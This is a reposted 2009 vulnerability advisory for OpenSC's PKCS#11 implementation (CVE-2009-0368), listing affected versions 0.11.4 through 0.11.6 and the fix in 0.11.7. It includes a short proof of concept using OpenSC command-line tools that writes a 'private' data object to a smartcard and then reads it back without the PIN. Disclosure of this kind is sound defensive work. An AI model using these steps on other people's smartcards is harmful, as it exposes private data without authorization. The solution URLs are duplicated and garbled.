No account yet?
Home » Exploits » OpenSC PKCS#11 Implementation Unauthorized Access Vulnerability
OpenSC PKCS#11 Implementation Unauthorized Access Vulnerability E-mail
Feeds - Exploits
Written by Andreas Jellinghaus   
Wednesday, 04 March 2009 22:12
OpenSC PKCS#11 Implementation Unauthorized Access Vulnerability


-\\Bugtraq ID:
33922

-\\Class:
Design Error

-\\CVE:


-\\Remote:
No

-\\Local:
Yes

-\\Published:
Feb 26 2009 12:00AM

-\\Updated:
Mar 04 2009 02:16PM

-\\Credit:
Andreas Jellinghaus



-\\Vulnerable:
Pardus Linux 2008  0
OpenSC OpenSC 0.11.6
OpenSC OpenSC 0.11.5
OpenSC OpenSC 0.11.4



-\\Not Vulnerable:
OpenSC OpenSC 0.11.7



-\\Discussion
OpenSC is prone to an unauthorized-access vulnerability.

Attackers can exploit this issue to gain unauthorized access to private data, which may lead to other attacks.

Versions prior to OpenSC 0.11.7 are vulnerable.



-\\Exploit(s)/PoC(s):
Attackers would need physical access to the smartcard reader.

The following proof of concept is available:

create a file with a secret:
echo "This is my secret data" > secret-file

To initialise a blank card:
pkcs15-init  --create-pkcs15  --use-default-transport-keys --profile pkcs15+onepin --pin 123456 --puk 78907890

To write a private data object to the card:
pkcs11-tool --label "my secret"  --type data --write-object secret-file
--private --login --pin 12345

To see all objects on the card:
pkcs15-tool --dump
This will list the data object, including the path it is stored, e.g.:
"Path:            3f0050154701"

To access such an object with low-level tools:

opensc-explorer
cd 5015
get 4701



-\\Solution
The vendor has released an update. Please see the references for more information.


OpenSC OpenSC 0.11.4
--OpenSC  opensc-0.11.7.tar.gz
http://www.opensc-project.org/files/opensc/opensc-0.11.7.tar.ghttp://www.opensc-project.org/files/opensc/opensc-0.11.7.tar.gz

OpenSC OpenSC 0.11.5
--OpenSC  opensc-0.11.7.tar.gz
http://www.opensc-project.org/files/opensc/opensc-0.11.7.tar.ghttp://www.opensc-project.org/files/opensc/opensc-0.11.7.tar.gz

OpenSC OpenSC 0.11.6
--OpenSC  opensc-0.11.7.tar.gz
http://www.opensc-project.org/files/opensc/opensc-0.11.7.tar.ghttp://www.opensc-project.org/files/opensc/opensc-0.11.7.tar.gz



-\\Reference(s)
--OpenSC Security Advisory [26-Feb-2009] CVE-2009-0368
http://permalink.gmane.org/gmane.comp.security.oss.general/152  (OpenSC)
--Vendor Homepage
http://www.opensc-project.org  (OpenSC)
 

Security Services by HSC

Contact us

Become partner
Advertise with us
Join our staff